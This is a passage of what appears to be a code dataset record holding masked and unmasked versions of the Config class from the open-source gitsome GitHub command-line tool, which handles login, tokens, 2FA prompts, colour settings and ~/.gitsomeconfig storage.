deducting from the rate limit. The ratelimit_remaining api does not\n seem to be available for GitHub Enterprise.\n\n github3.py's method check_authorization seems to only work given\n an authorization created by a registered application.\n\n TODO: Determine a better way to check the authorization for\n GitHub Enterprise.\n\n :type enterprise: bool\n :param enterprise: Determines whether we are authenticating with\n GitHub Enterprise.\n \"\"\"\n if self.enterprise_url is not None:\n return True\n try:\n if self.api is not None:\n self.api.ratelimit_remaining\n return True\n else:\n self.print_auth_error()\n except AuthenticationFailed:\n self.print_auth_error()\n return False\n\n def get_github_config_path(self, config_file_name):\n \"\"\"Attempt to find the github config file.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type config_file_name: str\n :param config_file_name: The config file name.\n\n :rtype: str\n :return: The github config file path.\n \"\"\"\n home = os.path.abspath(os.environ.get('HOME', ''))\n config_file_path = os.path.join(home, config_file_name)\n return config_file_path\n <mask token>\n\n def load_configs(self, config_funcs):\n \"\"\"Load the specified config from ~/.gitsomeconfig.\n\n :type foo: list\n :param foo: The config methods to run.\n \"\"\"\n config_file_path = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n try:\n with open(config_file_path) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n for config_func in config_funcs:\n config_func(parser)\n except IOError:\n return None\n\n def load_config_colors(self, parser):\n \"\"\"Load the color config from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.load_colors(parser)\n\n def load_colors(self, parser):\n \"\"\"Load all colors from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.clr_primary = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_PRIMARY, default=self.clr_primary, color_config=True)\n self.clr_secondary = self.load_config(parser=parser, cfg_label=self\n .CONFIG_CLR_SECONDARY, default=self.clr_secondary, color_config\n =True)\n self.clr_tertiary = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TERTIARY, default=self.clr_tertiary, color_config=True)\n self.clr_quaternary = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_QUATERNARY, default=self.clr_quaternary,\n color_config=True)\n self.clr_bold = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_BOLD, default=self.clr_bold, color_config=True)\n self.clr_code = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_CODE, default=self.clr_code, color_config=True)\n self.clr_code = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_ERROR, default=self.clr_code, color_config=True)\n self.clr_header = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_HEADER, default=self.clr_header, color_config=True)\n self.clr_link = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_LINK, default=self.clr_link, color_config=True)\n self.clr_list = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_LIST, default=self.clr_list, color_config=True)\n self.clr_message = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_MESSAGE, default=self.clr_message, color_config=True)\n self.clr_num_comments = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_NUM_COMMENTS, default=self.clr_num_comments,\n color_config=True)\n self.clr_num_points = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_NUM_POINTS, default=self.clr_num_points,\n color_config=True)\n self.clr_tag = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TAG, default=self.clr_tag, color_config=True)\n self.clr_time = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TIME, default=self.clr_time, color_config=True)\n self.clr_title = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TITLE, default=self.clr_title, color_config=True)\n self.clr_tooltip = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TOOLTIP, default=self.clr_tooltip, color_config=True)\n self.clr_user = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_USER, default=self.clr_user, color_config=True)\n self.clr_view_link = self.load_config(parser=parser, cfg_label=self\n .CONFIG_CLR_VIEW_LINK, default=self.clr_view_link, color_config\n =True)\n self.clr_view_index = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_VIEW_INDEX, default=self.clr_view_index,\n color_config=True)\n\n def load_urls(self, view_in_browser):\n \"\"\"Load the current set of urls from ~/.gitsomeconfigurl.\n\n :type view_in_browser: bool\n :param view_in_browser: Determines whether to view the urls in a\n browser.\n\n :rtype: list\n :return: Collection of urls.\n \"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n urls = parser.get(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST)\n urls = urls.strip()\n excludes = ['[', ']', \"'\"]\n for exclude in excludes:\n urls = urls.replace(exclude, '')\n if not view_in_browser:\n urls = urls.replace('https://github.com/', '')\n return urls.split(', ')\n\n def print_auth_error(self):\n \"\"\"Print a message the authorization has failed.\"\"\"\n click.secho('Authentication error.', fg=self.clr_error)\n click.secho(\n 'Update your credentials in ~/.gitsomeconfig or run:\\n gh configure'\n , fg=self.clr_message)\n\n def prompt_news_feed(self):\n \"\"\"Prompt the user to enter a news feed url.\"\"\"\n if click.confirm(\n \"\"\"No feed url detected.\n Calling gh events without an argument\n displays the logged in user's news feed.\nDo you want gitsome to track your news feed?\"\"\"\n , default=True):\n click.secho(\n \"\"\"Visit the following url while logged into GitHub:\n https://github.com\nEnter the url found under \"Subscribe to your news feed\".\"\"\"\n , fg=self.clr_message)\n self.user_feed = ''\n while not self.user_feed:\n self.user_feed = input('URL: ')\n\n def request_two_factor_code(self):\n \"\"\"Request two factor authentication code.\n\n Callback if two factor authentication is requested.\n\n :rtype: str\n :return: The user input two factor authentication code.\n \"\"\"\n code = ''\n while not code:\n code = input('Enter 2FA code: ')\n return code\n\n def save_config(self):\n \"\"\"Saves the config to ~/.gitsomeconfig.\"\"\"\n if self.check_auth():\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n parser.add_section(self.CONFIG_SECTION)\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_LOGIN, self.\n user_login)\n if self.user_token is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_TOKEN,\n self.user_token)\n if self.user_feed is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self\n .user_feed)\n if self.enterprise_url is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_ENTERPRISE_URL,\n self.enterprise_url)\n if self.user_pass is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_PASS,\n self.user_pass)\n else:\n parser.remove_option(self.CONFIG_SECTION, self.CONFIG_USER_PASS\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_VERIFY_SSL, self.\n verify_ssl)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_PRIMARY, self.\n clr_primary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_SECONDARY, self\n .clr_secondary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TERTIARY, self.\n clr_tertiary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_QUATERNARY,\n self.clr_quaternary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_BOLD, self.clr_bold\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_CODE, self.clr_code\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_ERROR, self.\n clr_error)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_HEADER, self.\n clr_header)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LINK, self.clr_link\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LIST, self.clr_list\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_MESSAGE, self.\n clr_message)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_COMMENTS,\n self.clr_num_comments)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_POINTS,\n self.clr_num_points)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TAG, self.clr_tag)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TIME, self.clr_time\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TITLE, self.\n clr_title)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TOOLTIP, self.\n clr_tooltip)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_USER, self.clr_user\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_LINK, self\n .clr_view_link)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_INDEX,\n self.clr_view_index)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n\n def save_urls(self):\n \"\"\"Save the current set of urls to ~/.gitsomeconfigurl.\"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n try:\n parser.add_section(self.CONFIG_URL_SECTION)\n except configparser.DuplicateSectionError:\n pass\n parser.set(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST, self.urls)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n\n def show_bash_completions_info(self):\n \"\"\"Show info on how to enable bash completions\"\"\"\n click.secho(\n \"\"\"By default, gitsome looks at the following locations to enable bash completions:\n https://github.com/donnemartin/gitsome/blob/master/xonsh/environ.py#L123-L130\nIf bash completions are not working for you, check out the following link:\n https://github.com/donnemartin/gitsome#enabling-bash-completions\"\"\"\n , fg=self.clr_message)\n", "step-4": "<mask token>\n\n\nclass Config(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n self.api = None\n self.user_login = None\n self.user_pass = None\n self.user_token = None\n self.user_feed = None\n self.enterprise_url = None\n self.verify_ssl = True\n self.urls = []\n self._init_colors()\n self.load_configs([self.load_config_colors])\n self.login = login\n self.authorize = authorize\n self.getpass = getpass\n\n def _init_colors(self):\n \"\"\"Initialize colors to their defaults.\"\"\"\n self.clr_primary = None\n self.clr_secondary = 'green'\n self.clr_tertiary = 'cyan'\n self.clr_quaternary = 'yellow'\n self.clr_bold = 'cyan'\n self.clr_code = 'cyan'\n self.clr_error = 'red'\n self.clr_header = 'yellow'\n self.clr_link = 'green'\n self.clr_list = 'cyan'\n self.clr_message = None\n self.clr_num_comments = 'green'\n self.clr_num_points = 'green'\n self.clr_tag = 'cyan'\n self.clr_time = 'yellow'\n self.clr_title = None\n self.clr_tooltip = None\n self.clr_user = 'cyan'\n self.clr_view_link = 'magenta'\n self.clr_view_index = 'magenta'\n\n def authenticate_cached_credentials(self, config, parser,\n enterprise_auth=enterprise_login):\n \"\"\"Authenticate with the user's credentials in ~/.gitsomeconfig.\n\n :type config: str\n :param config: The config path.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser.\n \"\"\"\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n self.user_login = self.load_config(parser=parser, cfg_label=\n self.CONFIG_USER_LOGIN)\n self.user_pass = self.load_config(parser=parser, cfg_label=self\n .CONFIG_USER_PASS)\n self.user_token = self.load_config(parser=parser, cfg_label=\n self.CONFIG_USER_TOKEN)\n self.enterprise_url = self.load_config(parser=parser, cfg_label\n =self.CONFIG_ENTERPRISE_URL)\n self.verify_ssl = self.load_config(parser=parser, cfg_label=\n self.CONFIG_VERIFY_SSL, boolean_config=True)\n self.user_feed = self.load_config(parser=parser, cfg_label=self\n .CONFIG_USER_FEED)\n if not self.verify_ssl:\n requests.packages.urllib3.disable_warnings(\n InsecureRequestWarning)\n login_kwargs = {'username': self.user_login,\n 'two_factor_callback': self.request_two_factor_code}\n if self.enterprise_url is not None:\n self.login = enterprise_auth\n login_kwargs.update({'url': self.enterprise_url, 'verify':\n self.verify_ssl})\n if self.user_token is not None:\n login_kwargs.update({'token': self.user_token})\n elif self.user_pass is not None:\n login_kwargs.update({'password': self.user_pass})\n else:\n self.print_auth_error()\n return\n else:\n login_kwargs.update({'token': self.user_token})\n self.api = self.login(**login_kwargs)\n\n def authenticate(self, enterprise=False, enterprise_auth=\n enterprise_login, overwrite=False):\n \"\"\"Log into GitHub.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type enterprise: bool\n :param enterprise: Determines whether to configure GitHub Enterprise.\n Default: False.\n\n :type overwrite: bool\n :param overwrite: indicates whether we cant to overwrite the current\n set of credentials. Default: False.\n \"\"\"\n if self.api is not None and not overwrite:\n return\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n if os.path.isfile(config) and os.access(config, os.R_OK | os.W_OK\n ) and not overwrite:\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n self.authenticate_cached_credentials(config, parser)\n else:\n login_kwargs = {'two_factor_callback': self.request_two_factor_code\n }\n if enterprise:\n self.login = enterprise_auth\n while not self.enterprise_url:\n self.enterprise_url = input('Enterprise URL: ')\n if click.confirm('Do you want to verify SSL certs?',\n default=True):\n self.verify_ssl = True\n else:\n self.verify_ssl = False\n login_kwargs.update({'url': self.enterprise_url, 'verify':\n self.verify_ssl})\n while not self.user_login:\n self.user_login = input('User Login: ')\n login_kwargs.update({'username': self.user_login})\n if click.confirm(\n 'Do you want to log in with a password [Y] or a personal access token [n]?'\n , default=True):\n user_pass = None\n while not user_pass:\n user_pass = self.getpass('Password: ')\n login_kwargs.update({'password': user_pass})\n try:\n if not enterprise:\n auth = self.authorize(self.user_login, user_pass,\n scopes=['user', 'repo'], note='gitsome',\n note_url=\n 'https://github.com/donnemartin/gitsome',\n two_factor_callback=self.request_two_factor_code)\n self.user_token = auth.token\n else:\n self.user_pass = user_pass\n except (UnprocessableEntity, AuthenticationFailed):\n click.secho('Error creating token.', fg=self.clr_error)\n click.secho(\n \"\"\"Visit the following page and verify you do not have an existing token named \"gitsome\":\n https://github.com/settings/tokens\nIf a token already exists, update your ~/.gitsomeconfig file with your token:\n user_token = TOKEN\nYou can also generate a new token.\"\"\"\n , fg=self.clr_message)\n self.print_auth_error()\n return\n else:\n while not self.user_token:\n self.user_token = input('Token: ')\n login_kwargs.update({'token': self.user_token})\n self.api = self.login(**login_kwargs)\n if self.user_feed:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self\n .user_feed)\n\n def check_auth(self):\n \"\"\"Check if the current authorization is valid.\n\n This method uses the ratelimit_remaining api to check whether\n the currently authenticated user's credentials are valid without\n deducting from the rate limit. The ratelimit_remaining api does not\n seem to be available for GitHub Enterprise.\n\n github3.py's method check_authorization seems to only work given\n an authorization created by a registered application.\n\n TODO: Determine a better way to check the authorization for\n GitHub Enterprise.\n\n :type enterprise: bool\n :param enterprise: Determines whether we are authenticating with\n GitHub Enterprise.\n \"\"\"\n if self.enterprise_url is not None:\n return True\n try:\n if self.api is not None:\n self.api.ratelimit_remaining\n return True\n else:\n self.print_auth_error()\n except AuthenticationFailed:\n self.print_auth_error()\n return False\n\n def get_github_config_path(self, config_file_name):\n \"\"\"Attempt to find the github config file.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type config_file_name: str\n :param config_file_name: The config file name.\n\n :rtype: str\n :return: The github config file path.\n \"\"\"\n home = os.path.abspath(os.environ.get('HOME', ''))\n config_file_path = os.path.join(home, config_file_name)\n return config_file_path\n\n def load_config(self, parser, cfg_label, default=None, color_config=\n False, boolean_config=False):\n \"\"\"Load the specified config from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n\n :type cfg_label: str\n :param cfg_label: The config label to load.\n\n :type default: str\n :param default: The default color if no color config exists.\n Default: None.\n\n :type color_config: bool\n :param color_config: Determines whether this is a color config.\n Default: False.\n\n :type boolean_config: bool\n :param boolean_config: Determines whether to load a boolean config.\n Default: False.\n \"\"\"\n try:\n if boolean_config:\n cfg = parser.getboolean(self.CONFIG_SECTION, cfg_label)\n else:\n cfg = parser.get(self.CONFIG_SECTION, cfg_label)\n if color_config:\n if cfg == 'none':\n cfg = None\n click.style('', fg=cfg)\n except (TypeError, configparser.NoOptionError):\n return default\n return cfg\n\n def load_configs(self, config_funcs):\n \"\"\"Load the specified config from ~/.gitsomeconfig.\n\n :type foo: list\n :param foo: The config methods to run.\n \"\"\"\n config_file_path = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n try:\n with open(config_file_path) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n for config_func in config_funcs:\n config_func(parser)\n except IOError:\n return None\n\n def load_config_colors(self, parser):\n \"\"\"Load the color config from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.load_colors(parser)\n\n def load_colors(self, parser):\n \"\"\"Load all colors from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.clr_primary = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_PRIMARY, default=self.clr_primary, color_config=True)\n self.clr_secondary = self.load_config(parser=parser, cfg_label=self\n .CONFIG_CLR_SECONDARY, default=self.clr_secondary, color_config\n =True)\n self.clr_tertiary = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TERTIARY, default=self.clr_tertiary, color_config=True)\n self.clr_quaternary = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_QUATERNARY, default=self.clr_quaternary,\n color_config=True)\n self.clr_bold = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_BOLD, default=self.clr_bold, color_config=True)\n self.clr_code = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_CODE, default=self.clr_code, color_config=True)\n self.clr_code = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_ERROR, default=self.clr_code, color_config=True)\n self.clr_header = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_HEADER, default=self.clr_header, color_config=True)\n self.clr_link = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_LINK, default=self.clr_link, color_config=True)\n self.clr_list = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_LIST, default=self.clr_list, color_config=True)\n self.clr_message = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_MESSAGE, default=self.clr_message, color_config=True)\n self.clr_num_comments = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_NUM_COMMENTS, default=self.clr_num_comments,\n color_config=True)\n self.clr_num_points = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_NUM_POINTS, default=self.clr_num_points,\n color_config=True)\n self.clr_tag = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TAG, default=self.clr_tag, color_config=True)\n self.clr_time = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TIME, default=self.clr_time, color_config=True)\n self.clr_title = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TITLE, default=self.clr_title, color_config=True)\n self.clr_tooltip = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TOOLTIP, default=self.clr_tooltip, color_config=True)\n self.clr_user = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_USER, default=self.clr_user, color_config=True)\n self.clr_view_link = self.load_config(parser=parser, cfg_label=self\n .CONFIG_CLR_VIEW_LINK, default=self.clr_view_link, color_config\n =True)\n self.clr_view_index = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_VIEW_INDEX, default=self.clr_view_index,\n color_config=True)\n\n def load_urls(self, view_in_browser):\n \"\"\"Load the current set of urls from ~/.gitsomeconfigurl.\n\n :type view_in_browser: bool\n :param view_in_browser: Determines whether to view the urls in a\n browser.\n\n :rtype: list\n :return: Collection of urls.\n \"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n urls = parser.get(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST)\n urls = urls.strip()\n excludes = ['[', ']', \"'\"]\n for exclude in excludes:\n urls = urls.replace(exclude, '')\n if not view_in_browser:\n urls = urls.replace('https://github.com/', '')\n return urls.split(', ')\n\n def print_auth_error(self):\n \"\"\"Print a message the authorization has failed.\"\"\"\n click.secho('Authentication error.', fg=self.clr_error)\n click.secho(\n 'Update your credentials in ~/.gitsomeconfig or run:\\n gh configure'\n , fg=self.clr_message)\n\n def prompt_news_feed(self):\n \"\"\"Prompt the user to enter a news feed url.\"\"\"\n if click.confirm(\n \"\"\"No feed url detected.\n Calling gh events without an argument\n displays the logged in user's news feed.\nDo you want gitsome to track your news feed?\"\"\"\n , default=True):\n click.secho(\n \"\"\"Visit the following url while logged into GitHub:\n https://github.com\nEnter the url found under \"Subscribe to your news feed\".\"\"\"\n , fg=self.clr_message)\n self.user_feed = ''\n while not self.user_feed:\n self.user_feed = input('URL: ')\n\n def request_two_factor_code(self):\n \"\"\"Request two factor authentication code.\n\n Callback if two factor authentication is requested.\n\n :rtype: str\n :return: The user input two factor authentication code.\n \"\"\"\n code = ''\n while not code:\n code = input('Enter 2FA code: ')\n return code\n\n def save_config(self):\n \"\"\"Saves the config to ~/.gitsomeconfig.\"\"\"\n if self.check_auth():\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n parser.add_section(self.CONFIG_SECTION)\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_LOGIN, self.\n user_login)\n if self.user_token is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_TOKEN,\n self.user_token)\n if self.user_feed is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self\n .user_feed)\n if self.enterprise_url is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_ENTERPRISE_URL,\n self.enterprise_url)\n if self.user_pass is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_PASS,\n self.user_pass)\n else:\n parser.remove_option(self.CONFIG_SECTION, self.CONFIG_USER_PASS\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_VERIFY_SSL, self.\n verify_ssl)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_PRIMARY, self.\n clr_primary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_SECONDARY, self\n .clr_secondary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TERTIARY, self.\n clr_tertiary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_QUATERNARY,\n self.clr_quaternary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_BOLD, self.clr_bold\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_CODE, self.clr_code\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_ERROR, self.\n clr_error)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_HEADER, self.\n clr_header)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LINK, self.clr_link\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LIST, self.clr_list\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_MESSAGE, self.\n clr_message)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_COMMENTS,\n self.clr_num_comments)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_POINTS,\n self.clr_num_points)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TAG, self.clr_tag)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TIME, self.clr_time\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TITLE, self.\n clr_title)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TOOLTIP, self.\n clr_tooltip)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_USER, self.clr_user\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_LINK, self\n .clr_view_link)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_INDEX,\n self.clr_view_index)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n\n def save_urls(self):\n \"\"\"Save the current set of urls to ~/.gitsomeconfigurl.\"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n try:\n parser.add_section(self.CONFIG_URL_SECTION)\n except configparser.DuplicateSectionError:\n pass\n parser.set(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST, self.urls)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n\n def show_bash_completions_info(self):\n \"\"\"Show info on how to enable bash completions\"\"\"\n click.secho(\n \"\"\"By default, gitsome looks at the following locations to enable bash completions:\n https://github.com/donnemartin/gitsome/blob/master/xonsh/environ.py#L123-L130\nIf bash completions are not working for you, check out the following link:\n https://github.com/donnemartin/gitsome#enabling-bash-completions\"\"\"\n , fg=self.clr_message)\n", "step-5": "# -*- coding: utf-8 -*-\n\n# Copyright 2015 Donne Martin. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\n\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\n\nimport click\nfrom getpass import getpass\nimport os\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nfrom .compat import configparser\nfrom .lib.github3 import authorize, enterprise_login, login\nfrom .lib.github3.exceptions import AuthenticationFailed, UnprocessableEntity\n\n\nclass Config(object):\n \"\"\"Gitsome config.\n\n :type api: :class:`github3.github.Github`\n :param api: An instance of github3.github.Github.\n\n :type clr_x: str\n :param clr_x: Various ansi color config colors to use for highlights.\n\n :type CONFIG: str\n :param CONFIG: The config file name.\n\n :type CONFIG_SECTION: str\n :param CONFIG_SECTION: The main config file section label.\n\n :type CONFIG_CLR_X: str\n :param CONFIG_CLR_X: Various ansi color config labels to use for highlights.\n\n :type CONFIG_ENTERPRISE_URL: str\n :param CONFIG_ENTERPRISE_URL: The GitHub Enterprise url.\n\n :type CONFIG_USER_LOGIN: str\n :param CONFIG_USER_LOGIN: The user login.\n\n :type CONFIG_USER_PASS: str\n :param CONFIG_USER_PASS: The user password.\n\n :type CONFIG_USER_TOKEN: str\n :param CONFIG_USER_TOKEN: The user token.\n\n :type CONFIG_USER_FEED: str\n :param CONFIG_USER_FEED: The user feed config. This is the feed on\n https://github.com/ when logged in and requires the basic auth model,\n which doesn't work when logging in with tokens or 2FA. This config\n listed the pre-signed url to access the feed.\n\n :type CONFIG_URL: str\n :param CONFIG_URL: The config file name that contains urls used in the\n `gh view` command.\n\n :type CONFIG_URL_SECTION: str\n :param CONFIG_URL_SECTION: The config file section that contains urls used\n in the `gh view [url_index]` command.\n\n :type CONFIG_URL_LIST: str\n :param CONFIG_URL_LIST: The config containing a list of the last set of\n urls the user has seen, which allows the user to quickly access a repo\n url with the `gh view [url_index]` command.\n\n :type CONFIG_VERIFY_SSL: str\n :param CONFIG_VERIFY_SSL: Determines whether to verify SSL certs.\n\n :type enterprise_url: str\n :param enterprise_url: The GitHub Enterprise url.\n\n :type urls: list\n :param urls: The last set of urls the user has seen, which allows the user\n to quickly access a repo url with the gh view [url_index] command.\n\n :type user_login: str\n :param user_login: The user's login in ~/.gitsomeconfig.\n\n :type user_pass: str\n :param user_pass: The user's pass in ~/.gitsomeconfig.\n This is only stored for GitHub Enterprise users since using only a\n personal access token does not seem to be supported.\n\n :type user_token: str\n :param user_token: The user's token in ~/.gitsomeconfig.\n\n :type verify_ssl: bool\n :param verify_ssl: Determines whether to verify SSL certs.\n \"\"\"\n\n CONFIG = '.gitsomeconfig'\n CONFIG_CLR_PRIMARY = 'clr_primary'\n CONFIG_CLR_SECONDARY = 'clr_secondary'\n CONFIG_CLR_TERTIARY = 'clr_tertiary'\n CONFIG_CLR_QUATERNARY = 'clr_quaternary'\n CONFIG_CLR_BOLD = 'clr_bold'\n CONFIG_CLR_CODE = 'clr_code'\n CONFIG_CLR_ERROR = 'clr_error'\n CONFIG_CLR_HEADER = 'clr_header'\n CONFIG_CLR_LINK = 'clr_link'\n CONFIG_CLR_LIST = 'clr_list'\n CONFIG_CLR_MESSAGE = 'clr_message'\n CONFIG_CLR_NUM_COMMENTS = 'clr_num_comments'\n CONFIG_CLR_NUM_POINTS = 'clr_num_points'\n CONFIG_CLR_TAG = 'clr_tag'\n CONFIG_CLR_TIME = 'clr_time'\n CONFIG_CLR_TITLE = 'clr_title'\n CONFIG_CLR_TOOLTIP = 'clr_tooltip'\n CONFIG_CLR_USER = 'clr_user'\n CONFIG_CLR_VIEW_LINK = 'clr_view_link'\n 